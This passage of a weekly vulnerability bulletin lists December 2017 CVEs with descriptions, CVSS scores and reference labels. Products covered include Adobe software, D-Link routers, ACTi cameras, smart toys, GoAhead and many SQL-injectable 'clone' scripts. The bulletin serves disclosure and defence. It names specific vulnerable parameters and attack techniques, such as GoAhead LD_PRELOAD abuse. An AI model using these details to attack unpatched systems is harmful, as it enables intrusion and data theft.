adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. This vulnerability is an instance of a Same Origin Policy security bypass vulnerability, affecting files on the local system, etc.2017-12-094.3CVE-2017-16369
BID
SECTRACK
CONFIRM
adobe -- acrobatAn issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. The issue is a stack exhaustion problem within the JavaScript API, where the computation does not correctly control the amount of recursion that can happen with respect to system resources.2017-12-094.3CVE-2017-16419
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11287
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11288
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A reflected cross-site scripting vulnerability exists that can result in information disclosure.2017-12-094.3CVE-2017-11289
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A UI Redress (or Clickjacking) vulnerability exists. This issue has been resolved by adding a feature that enables Connect administrators to protect users from UI redressing (or clickjacking) attacks.2017-12-094.3CVE-2017-11290
BID
SECTRACK
CONFIRM
adobe -- connectAn issue was discovered in Adobe Connect 9.6.2 and earlier versions. A Server-Side Request Forgery (SSRF) vulnerability exists that could be abused to bypass network access controls.2017-12-096.4CVE-2017-11291
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. Adobe Digital Editions parses crafted XML files in an unsafe manner, which could lead to sensitive information disclosure.2017-12-094.3CVE-2017-11273
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11297
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11298
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11299
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11300
BID
SECTRACK
CONFIRM
adobe -- digital_editionsAn issue was discovered in Adobe Digital Editions 4.5.6 and earlier versions. An exploitable memory corruption vulnerability exists, which could lead to disclosure of memory addresses.2017-12-095.0CVE-2017-11301
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. A cross-site scripting vulnerability in Apache Sling Servlets Post 2.3.20 has been resolved in Adobe Experience Manager.2017-12-094.3CVE-2017-11296
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Adobe Experience Manager has a reflected cross-site scripting vulnerability in the HtmlRendererServlet.2017-12-094.3CVE-2017-3109
BID
SECTRACK
CONFIRM
adobe -- experience_managerAn issue was discovered in Adobe Experience Manager 6.3, 6.2, 6.1, 6.0. Sensitive tokens are included in http GET requests under certain circumstances.2017-12-095.0CVE-2017-3111
BID
SECTRACK
CONFIRM
Back to top

 

Low Vulnerabilities

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
There were no low vulnerabilities recorded this week.
Back to top

 

Severity Not Yet Assigned

Primary
Vendor -- Product
DescriptionPublishedCVSS ScoreSource & Patch Info
abiword -- abiword
 
af/util/xp/ut_go_file.cpp in AbiWord 3.0.2-2 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17529
MISC
acdsee -- acdsee_ultimate_10.0.0.292
 
A memory corruption vulnerability exists in the .PSD parsing functionality of ACDSee Ultimate 10.0.0.292. A specially crafted .PSD file can cause an out of bounds write vulnerability resulting in potential code execution. An attacker can send a specific .PSD file to trigger this vulnerability.2017-12-11not yet calculatedCVE-2017-2886
BID
MISC
acti -- acti_cameras
 
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC use non-random default credentials across all devices. A remote attacker can take complete control of a device using default admin credentials.2017-12-15not yet calculatedCVE-2017-3186
BID
MISC
MISC
CERT-VN
acti -- acti_cameras
 
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC fail to properly restrict access to the factory reset page. An unauthenticated, remote attacker can exploit this vulnerability by directly accessing the http://ift.tt/2mxsDrj page. This will allow an attacker to perform a factory reset on the device, leading to a denial of service condition or the ability to make use of default credentials (CVE-2017-3186).2017-12-15not yet calculatedCVE-2017-3184
BID
MISC
MISC
CERT-VN
acti -- acti_cameras
 
ACTi cameras including the D, B, I, and E series using firmware version A1D-500-V6.11.31-AC have a web application that uses the GET method to process requests that contain sensitive information such as user account name and password, which can expose that information through the browser's history, referrers, web logs, and other sources.2017-12-15not yet calculatedCVE-2017-3185
BID
MISC
MISC
CERT-VN
adobe -- acrobat
 
An issue was discovered in Adobe Acrobat and Reader: 2017.012.20098 and earlier versions, 2017.011.30066 and earlier versions, 2015.006.30355 and earlier versions, and 11.0.22 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11293
BID
SECTRACK
CONFIRM
adobe -- dng
 
An issue was discovered in Adobe DNG Converter 9.12.1 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11295
BID
CONFIRM
adobe -- flash_playerAn issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK metadata functionality. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11225
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of providing language- and region- or country- specific functionality. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3114
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability is an instance of a use after free vulnerability in the Primetime SDK. The mismatch between an old and a new object can provide an attacker with unintended memory access -- potentially leading to code corruption, control-flow hijack, or an information leak attack. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11215
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player

 
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer due to an integer overflow; the computation is part of the abstraction that creates an arbitrarily sized transparent or opaque bitmap image. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-11213
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- flash_player
 
A regression affecting Adobe Flash Player version 27.0.0.187 (and earlier versions) causes the unintended reset of the global settings preference file when a user clears browser data.2017-12-13not yet calculatedCVE-2017-11305
BID
SECTRACK
CONFIRM
adobe -- flash_player
 
An issue was discovered in Adobe Flash Player 27.0.0.183 and earlier versions. This vulnerability occurs as a result of a computation that reads data that is past the end of the target buffer; the computation is part of AdobePSDK metadata. The use of an invalid (out-of-range) pointer offset during access of internal data structure fields causes the vulnerability. A successful attack can lead to sensitive data exposure.2017-12-09not yet calculatedCVE-2017-3112
BID
SECTRACK
REDHAT
CONFIRM
GENTOO
adobe -- indesign
 
An issue was discovered in Adobe InDesign 12.1.0 and earlier versions. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11302
BID
SECTRACK
CONFIRM
adobe -- shockwave
 
An issue was discovered in Adobe Shockwave 12.2.9.199 and earlier. An exploitable memory corruption vulnerability exists. Successful exploitation could lead to arbitrary code execution.2017-12-09not yet calculatedCVE-2017-11294
BID
SECTRACK
CONFIRM
amag_technologies -- symmetry_edge_network_door_controllers
 
Incorrect access control in AMAG Symmetry Door Edge Network Controllers (EN-1DBC Boot App 23611 03.60 and STD App 23603 03.60; EN-2DBC Boot App 24451 01.00 and STD App 2461 01.00) enables remote attackers to execute door controller commands (e.g., lock, unlock, add ID card value) by sending unauthenticated requests to the affected devices via Serial over TCP/IP, as demonstrated by a Ud command.2017-12-09not yet calculatedCVE-2017-16241
MISC
MISC
MISC
apache -- fineract
 
In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query.2017-12-14not yet calculatedCVE-2017-5663
MLIST
apache -- synapse
 
Due to the presence of Apache Commons Collections 3.2.1 (commons-collections-3.2.1.jar) or previous versions, Apache Synapse 3.0.0 or all previous releases (3.0.0, 2.1.0, 2.0.0, 1.2, 1.1.2, 1.1.1) allows remote code execution attacks that can be performed by injecting specially crafted serialized objects. To mitigate the issue upgrading to 3.0.1 version is required. In Synapse 3.0.1 version, Commons Collection has been updated to 3.2.2 version which contains the fix for the above mentioned vulnerability.2017-12-11not yet calculatedCVE-2017-15708
BID
MLIST
asterisk -- multiple_products
 
A Remote Crash issue was discovered in Asterisk Open Source 13.x before 13.18.4, 14.x before 14.7.4, and 15.x before 15.1.4 and Certified Asterisk before 13.13-cert9. Certain compound RTCP packets cause a crash in the RTCP Stack.2017-12-13not yet calculatedCVE-2017-17664
MISC
BID
MISC
MISC
atlassian -- bamboo
 
Bamboo did not check that the name of a branch in a Mercurial repository contained argument parameters. An attacker who has permission to create a repository in Bamboo, edit an existing plan that has a non-linked Mercurialrepository, create or edit a plan when there is at least one linked Mercurial repository that the attacker has permission to use, or commit to a Mercurial repository used by a Bamboo plan which has branch detection enabled can execute code of their choice on systems that run a vulnerable version of Bamboo Server. Versions of Bamboo starting with 2.7.0 before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.2017-12-13not yet calculatedCVE-2017-14590
BID
CONFIRM
CONFIRM
atlassian -- bamboo
 
It was possible for double OGNL evaluation in FreeMarker templates through Struts FreeMarker tags to occur. An attacker who has restricted administration rights to Bamboo or who hosts a website that a Bamboo administrator visits, is able to exploit this vulnerability to execute Java code of their choice on systems that run a vulnerable version of Bamboo. All versions of Bamboo before 6.1.6 (the fixed version for 6.1.x) and from 6.2.0 before 6.2.5 (the fixed version for 6.2.x) are affected by this vulnerability.2017-12-13not yet calculatedCVE-2017-14589
BID
CONFIRM
CONFIRM
aubio -- aubio
 
A NULL pointer dereference (DoS) Vulnerability was found in the function aubio_source_avcodec_readframe in io/source_avcodec.c of aubio 0.4.6, which may lead to DoS when playing a crafted audio file.2017-12-11not yet calculatedCVE-2017-17554
MISC
bernard_parisse_giac -- bernard_parisse_giacInput.cc in Bernard Parisse Giac 1.2.3.57 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17526
MISC
bob_hepple_gjots2 -- bob_hepple_gjots2
 
lib/gui.py in Bob Hepple gjots2 2.4.1 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17535
MISC

boxug -- trape


 
Trape before 2017-11-05 has XSS via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17714
MISC
MISC
MISC

boxug -- trape


 
Trape before 2017-11-05 has SQL injection via the /nr red parameter, the /nr vId parameter, the /register User-Agent HTTP header, the /register country parameter, the /register countryCode parameter, the /register cpu parameter, the /register isp parameter, the /register lat parameter, the /register lon parameter, the /register org parameter, the /register query parameter, the /register region parameter, the /register regionName parameter, the /register timezone parameter, the /register vId parameter, the /register zip parameter, or the /tping id parameter.2017-12-16not yet calculatedCVE-2017-17713
MISC
MISC
MISC
MISC
MISC
cisco -- asa_5500_series_routers
 
A vulnerability in the TLS protocol implementation of legacy Cisco ASA 5500 Series (ASA 5505, 5510, 5520, 5540, and 5550) devices could allow an unauthenticated, remote attacker to access sensitive information, aka a Return of Bleichenbacher's Oracle Threat (ROBOT) attack. An attacker could iteratively query a server running a vulnerable TLS stack implementation to perform cryptanalytic operations that may allow decryption of previously captured TLS sessions. Cisco Bug IDs: CSCvg97652.2017-12-15not yet calculatedCVE-2017-12373
CONFIRM
citrix -- multiple_productsCitrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 might allow remote attackers to decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, aka a ROBOT attack.2017-12-13not yet calculatedCVE-2017-17382
BID
SECTRACK
MISC
CONFIRM
CERT-VN
citrix -- multiple_products
 
Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway 10.5 before build 67.13, 11.0 before build 71.22, 11.1 before build 56.19, and 12.0 before build 53.22 allow remote attackers to obtain sensitive information from the backend client TLS handshake by leveraging use of TLS with Client Certificates and a Diffie-Hellman Ephemeral (DHE) key exchange.2017-12-13not yet calculatedCVE-2017-17549
BID
SECTRACK
CONFIRM
commvault -- edge_communication_service
 
Commvault Edge Communication Service (cvd) prior to version 11 SP7 or version 11 SP6 with hotfix 590 is prone to a stack-based buffer overflow vulnerability that could lead to arbitrary code execution with administrative privileges.2017-12-15not yet calculatedCVE-2017-3195
CONFIRM
MISC
BID
EXPLOIT-DB
CERT-VN
crowdfunding_software -- realestate_crowdfunding_script
 
Realestate Crowdfunding Script 2.7.2 has SQL Injection via the single-cause.php pid parameter.2017-12-13not yet calculatedCVE-2017-17591
MISC
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
 
D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 are vulnerable to authentication bypass of the remote login page. A remote attacker that can access the remote management login page can manipulate the POST request in such a manner as to access some administrator-only pages such as tools_admin.asp without credentials.2017-12-15not yet calculatedCVE-2017-3191
MISC
CERT-VN
MISC
MISC
d-link -- dir-130_firmware_version_1.23_and_dir-330_firmware_version_1.12
 
D-Link DIR-130 firmware version 1.23 and DIR-330 firmware version 1.12 do not sufficiently protect administrator credentials. The tools_admin.asp page discloses the administrator password in base64 encoding in the returned web page. A remote attacker with access to this page (potentially through a authentication bypass such as CVE-2017-3191) may obtain administrator credentials for the device.2017-12-15not yet calculatedCVE-2017-3192
MISC
CERT-VN
MISC
MISC
d-link -- multiple_devices
 
Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service.2017-12-15not yet calculatedCVE-2017-3193
BID
MISC
MISC
CERT-VN
MISC
elemental_path -- cognitoys_dino_smart_toys
 
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 share a fixed small pool of hardcoded keys, allowing a remote attacker to use a different Dino device to decrypt VoIP traffic between a child's Dino and remote server.2017-12-11not yet calculatedCVE-2017-8866
MISC
elemental_path -- cognitoys_dino_smart_toys
 
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 use AES-128 with ECB mode to encrypt voice traffic between the device and remote server, allowing a malicious user to map encrypted traffic to a particular AES key index and gaining further access to eavesdrop on privacy-sensitive voice communication of a child and their Dino device.2017-12-11not yet calculatedCVE-2017-8867
MISC
elemental_path -- cognitoys_dino_smart_toys
 
Elemental Path's CogniToys Dino smart toys through firmware version 0.0.794 do not provide sufficient protections against capture-replay attacks, allowing an attacker on the network to replay VoIP traffic between a Dino device and remote server to any other Dino device.2017-12-11not yet calculatedCVE-2017-8865
MISC
embedthis -- goahead
 
Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked. This is a result of initializing the environment of forked CGI scripts using untrusted HTTP request parameters in the cgiHandler function in cgi.c. When combined with the glibc dynamic linker, this behaviour can be abused for remote code execution using special parameter names such as LD_PRELOAD. An attacker can POST their shared object payload in the body of the request, and reference it using /proc/self/fd/0.2017-12-12not yet calculatedCVE-2017-17562
MISC
MISC
emc -- isilon_onefs
 
In EMC Isilon OneFS 8.1.0.0, 8.0.1.0 - 8.0.1.1, 8.0.0.0 - 8.0.0.4, 7.2.1.0 - 7.2.1.5, 7.2.0.x, and 7.1.1.x, a malicious compliance admin (compadmin) account user could exploit a vulnerability in isi_get_itrace or isi_get_profile maintenance scripts to run any shell script as system root on a cluster in compliance mode. This could potentially lead to an elevation of privilege for the compadmin user and violate compliance mode.2017-12-13not yet calculatedCVE-2017-14380
CONFIRM
erlang -- erlang
 
The Erlang otp TLS server answers with different TLS alerts to different error types in the RSA PKCS #1 1.5 padding. This allows an attacker to decrypt content or sign messages with the server's private key (this is a variation of the Bleichenbacher attack).2017-12-12not yet calculatedCVE-2017-1000385
MLIST
MLIST
MLIST
BID
MISC
DEBIAN
CERT-VN
exiv2 -- exiv2
 
There is a heap-based buffer over-read in the Exiv2::Internal::PngChunk::keyTXTChunk function of pngchunk_int.cpp in Exiv2 0.26. A crafted PNG file will lead to a remote denial of service attack.2017-12-13not yet calculatedCVE-2017-17669
MISC
ffmpeg -- libswresample
 
The swri_audio_convert function in audioconvert.c in FFmpeg libswresample through 3.0.101, as used in FFmpeg 3.4.1, aubio 0.4.6, and other products, allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted audio file.2017-12-11not yet calculatedCVE-2017-17555
MISC
flash_seats -- flash_seats_mobile_app_for_android
 
Flash Seats Mobile App for Android version 1.7.9 and earlier and for iOS version 1.9.51 and earlier fails to properly validate SSL certificates provided by HTTPS connections, which may enable an attacker to conduct man-in-the-middle (MITM) attacks.2017-12-15not yet calculatedCVE-2017-3190
BID
CERT-VN
MISC
flippa-clone.com -- website_auction_marketplace
 
Website Auction Marketplace 2.0.5 has SQL Injection via the search.php cat_id parameter.2017-12-13not yet calculatedCVE-2017-17592
MISC
fontforge -- fontforge
 
uiutil.c in FontForge through 20170731 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL, a different vulnerability than CVE-2017-17534.2017-12-14not yet calculatedCVE-2017-17521
MISC
fortinet -- forticlient_fortios
 
An Information Disclosure vulnerability in Fortinet FortiOS 5.6.0 to 5.6.2, 5.4.0 to 5.4.5, 5.2 and below versions allow an admin user with super_admin privileges to view the current SSL VPN web portal session info which may contains user credentials through the fnsysctl CLI command.2017-12-13not yet calculatedCVE-2017-7738
BID
CONFIRM
fortinet -- forticlient_windows
 
A privilege escalation in Fortinet FortiClient Windows 5.4.3 and earlier as well as 5.6.0 allows attacker to gain privilege via exploiting the Windows "security alert" dialog thereby popping up when the "VPN before logon" feature is enabled and an untrusted certificate chain.2017-12-14not yet calculatedCVE-2017-7344
BID
CONFIRM
fortinet -- forticlient
 
An Information Disclosure vulnerability in Fortinet FortiClient for Windows 5.6.0 and below versions, FortiClient for Mac OSX 5.6.0 and below versions and FortiClient SSLVPN Client for Linux 4.4.2334 and below versions allows regular users to see each other's VPN authentication credentials due to improperly secured storage locations.2017-12-15not yet calculatedCVE-2017-14184
BID
CONFIRM
fortunescripts.com -- N/A
 
Basic Job Site Script 2.0.5 has SQL Injection via the keyword parameter to /job.2017-12-13not yet calculatedCVE-2017-17642
MISC
fs -- amazon_clone
 
FS Amazon Clone 1.0 has SQL Injection via the PATH_INFO to /VerAyari.2017-12-13not yet calculatedCVE-2017-17572
MISC
fs -- care_cloneFS Care Clone 1.0 has SQL Injection via the searchJob.php jobType or jobFrequency parameter.2017-12-13not yet calculatedCVE-2017-17574
MISC
fs -- crowdfunding_clone
 
FS Crowdfunding Script 1.0 has SQL Injection via the latest_news_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17578
MISC
fs -- expedia_clone
 
FS Expedia Clone 1.0 has SQL Injection via the pages.php or content.php id parameter, or the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17570
MISC
fs -- expedia_clone
 
FS Ebay Clone 1.0 has SQL Injection via the product.php id parameter, or the search.php category_id or sub_category_id parameter.2017-12-13not yet calculatedCVE-2017-17573
MISC
fs -- foodpanda_clone
 
FS Foodpanda Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17571
MISC
fs -- freelancer_clone
 
FS Freelancer Clone 1.0 has SQL Injection via the profile.php u parameter.2017-12-13not yet calculatedCVE-2017-17579
MISC
fs -- gigs_clone
 
FS Gigs Script 1.0 has SQL Injection via the browse-category.php cat parameter, browse-scategory.php sc parameter, or service-provider.php ser parameter.2017-12-13not yet calculatedCVE-2017-17576
MISC
fs -- groupon_clone
 
FS Groupon Clone 1.0 has SQL Injection via the item_details.php id parameter or the vendor_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17575
MISC
fs -- grubhub_clone
 
FS Grubhub Clone 1.0 has SQL Injection via the /food keywords parameter.2017-12-13not yet calculatedCVE-2017-17582
MISC
fs -- imdb_clone
 
FS IMDB Clone 1.0 has SQL Injection via the movie.php f parameter, tvshow.php s parameter, or show_misc_video.php id parameter.2017-12-13not yet calculatedCVE-2017-17588
MISC
fs -- indiamart_clone
 
FS Indiamart Clone 1.0 has SQL Injection via the catcompany.php token parameter, buyleads-details.php id parameter, or company/index.php c parameter.2017-12-13not yet calculatedCVE-2017-17587
MISC
fs -- linkedin_clone
 
FS Linkedin Clone 1.0 has SQL Injection via the group.php grid parameter, profile.php fid parameter, or company_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17580
MISC
fs -- makemytrip_clone
 
FS Makemytrip Clone 1.0 has SQL Injection via the show-flight-result.php fl_orig or fl_dest parameter.2017-12-13not yet calculatedCVE-2017-17584
MISC
fs -- monster_clone
 
FS Monster Clone 1.0 has SQL Injection via the Employer_Details.php id parameter.2017-12-13not yet calculatedCVE-2017-17585
MISC
fs -- olx_clone
 
FS Olx Clone 1.0 has SQL Injection via the subpage.php scat parameter or the message.php pid parameter.2017-12-13not yet calculatedCVE-2017-17586
MISC
fs -- quibids_clone
 
FS Quibids Clone 1.0 has SQL Injection via the itechd.php productid parameter.2017-12-13not yet calculatedCVE-2017-17581
MISC
fs -- shutterstock_clone
 
FS Shutterstock Clone 1.0 has SQL Injection via the /Category keywords parameter.2017-12-13not yet calculatedCVE-2017-17583
MISC
fs -- stackoverflow_clone
 
FS Stackoverflow Clone 1.0 has SQL Injection via the /question keywords parameter.2017-12-13not yet calculatedCVE-2017-17590
MISC
fs -- thumbtack_clone
 
FS Thumbtack Clone 1.0 has SQL Injection via the browse-category.php cat parameter or the browse-scategory.php sc parameter.2017-12-13not yet calculatedCVE-2017-17589
MISC
fs -- trademe_clone
 
FS Trademe Clone 1.0 has SQL Injection via the search_item.php search parameter or the general_item_details.php id parameter.2017-12-13not yet calculatedCVE-2017-17577
MISC
geomview -- geomview
 
common/help.c in Geomview 1.9.5 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17530
MISC
gnu_global -- gnu_global
 
gozilla.c in GNU GLOBAL 4.8.6 does not validate strings before launching the program specified by the BROWSER environment variable, which might allow remote attackers to conduct argument-injection attacks via a crafted URL.2017-12-14not yet calculatedCVE-2017-17531
MISC
graphicsmagick -- graphicsmagick
 
ReadRGBImage in coders/rgb.c in GraphicsMagick 1.3.26 has a magick/import.c ImportRGBQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17500
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
WriteOnePNGImage in coders/png.c in GraphicsMagick 1.3.26 has a heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17501
CONFIRM
BID
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadCMYKImage in coders/cmyk.c in GraphicsMagick 1.3.26 has a magick/import.c ImportCMYKQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17502
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
ReadGRAYImage in coders/gray.c in GraphicsMagick 1.3.26 has a magick/import.c ImportGrayQuantumType heap-based buffer over-read via a crafted file.2017-12-10not yet calculatedCVE-2017-17503
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
 
WritePNMImage in coders/pnm.c in GraphicsMagick 1.3.26 allows remote attackers to cause a denial of service (bit_stream.c MagickBitStreamMSBWrite heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted file.2017-12-10not yet calculatedCVE-2017-17498
CONFIRM
BID
CONFIRM
harbor -- harbor
 
The Ping() function in ui/api/target.go in Harbor through 1.3.0-rc4 has SSRF via the endpoint parameter to /api/targets/ping.2017-12-15not yet calculatedCVE-2017-17697
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5T_conv_struct_opt in H5Tconv.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17507
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a NULL pointer dereference in the function H5O_pline_decode in the H5Opline.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17505
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds read vulnerability in the function H5Opline_pline_decode in H5Opline.c in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17506
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is an out of bounds write vulnerability in the function H5G__ent_decode_vec in H5Gcache.c in libhdf5.a. For example, h5dump would crash or possibly have unspecified other impact someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17509
MISC
hdf5 -- hdf5
 
In HDF5 1.10.1, there is a divide-by-zero vulnerability in the function H5T_set_loc in the H5T.c file in libhdf5.a. For example, h5dump would crash when someone opens a crafted hdf5 file.2017-12-10not yet calculatedCVE-2017-17508
MISC
huawei -- multiple_products
 
Huawei EC156, EC176, and EC177 USB Modem products with software before UTPS-V200R003B015D02SP07C1014 (23.015.02.07.1014) and before V200R003B015D02SP08C1014 (23.015.02.08.1014) use a weak ACL for the "Mobile Partner" directory, which allows remote attackers to gain SYSTEM privileges by compromising a low privilege account and modifying Mobile Partner.exe.2017-12-11not yet calculatedCVE-2014-8358
CONFIRM
BID
MISC

ibm -- connections_engagement_center

IBM Connections Engagement Center 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 134005.2017-12-11not yet calculatedCVE-2017-1683
CONFIRM
BID
MISC
ibm -- connections
 
IBM Connections 6.0 could allow an unauthenticated remote attacker to gain unauthenticated or unauthorized access to non-sensitive Engagement Center template data. IBM X-Force ID: 132954.2017-12-11not yet calculatedCVE-2017-1613
CONFIRM
BID
MISC
ibm -- doors_next_generation
 
IBM DOORS Next Generation (DNG/RRC) 4.07, 5.0, and 6.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 130915.2017-12-13not yet calculatedCVE-2017-1546
CONFIRM
BID
MISC
ibm -- financial_transaction_manager_for_multi-platform
 
IBM Financial Transaction Manager (FTM) for Multi-Platform (MP) 3.0.0.0 through 3.0.0.7 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-Force ID: 132926.2017-12-11not yet calculatedCVE-2017-1606
CONFIRM
BID
MISC
ibm -- inotes
 
IBM iNotes is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.2017-12-13not yet calculatedCVE-2017-1421
CONFIRM
BID
SECTRACK
MISC
ibm -- jazz_foundation_products
 
IBM Jazz Foundation Products could disclose sensitive information during a scan that could lead to further attacks against the system. IBM X-Force ID: 129619.2017-12-11not yet calculatedCVE-2017-1507
CONFIRM
MISC
ibm -- maximo_asset_management
 
